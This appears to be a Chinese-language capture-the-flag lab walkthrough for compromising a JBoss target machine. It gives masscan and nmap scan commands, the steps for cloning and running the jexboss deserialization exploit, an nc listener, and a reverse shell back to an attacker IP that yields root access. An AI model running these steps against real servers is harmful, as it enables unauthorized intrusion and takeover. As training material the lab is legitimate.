JexBoss-Jboss靶机渗透实战

实验步骤

(1)信息收集-端口扫描

1.扫描端口(masscan)

masscan –rate=10000 –ports 0-65535 192.168.7.30

masscan –rate=每秒多少个数据包 –ports 端口范围 IP地址/IP地址段

Masscan扫描速度快,为了防止漏扫,可以多扫描几次;

2.扫描端口的详细信息(nmap)

nmap -sV -T4 192.168.7.30

nmap -sV -T4 -A 192.168.7.30

  • 其中:-T4指定扫描过程中使用的时序(分为0-5等级);
  • -sV扫描版本的信息和开启的服务;
  • 也可以选择带-A参数,详细扫描开放端口的具体服务;
  • 与masscan相比,namp更详细,但是速度较慢(可以通过masscan快速扫描,再使用nmap扫描具体开放的端口)

(2)渗透测试

经过上面的信息发现开启了80,22,8080,3389端口,在浏览器中访问8080端口,发现为Jboss搭建网站,如图所示

尝试使用Jboss反序列化脚本,在kali攻击中输入git clone https://github.com/joaomatosf/jexboss.git克隆脚本,如图所示

输入cd jexboss,进入jexboss工具目录,输入pip install -r requires.txt命令,进行安装,如图所示

如果未能执行pip命令,参照

https://www.cnblogs.com/zhongyehai/p/10619917.html

提前进行端口的监听,输入命令nc –lvp 1234,监听1234端口。如图所示

运行脚本,执行攻击命令python jexboss.py -host http://192.168.7.30:8080其中,192.168.7.30为靶机地址。如图所示。

在弹出的第一个选项中,选择【no】,如图所示

在弹出的第二个选项中,选择【yes】,如图所示

在【IP Address】项填写172.16.11.51(攻击机地址),【Port】填写1234.输入回车确定。如图所示

回到之前开启的监听端口菜单,可以看到,反弹shell成功,拥有root权限。如图所示

在根目录找到第一个flag

在/home目录寻找第二个flag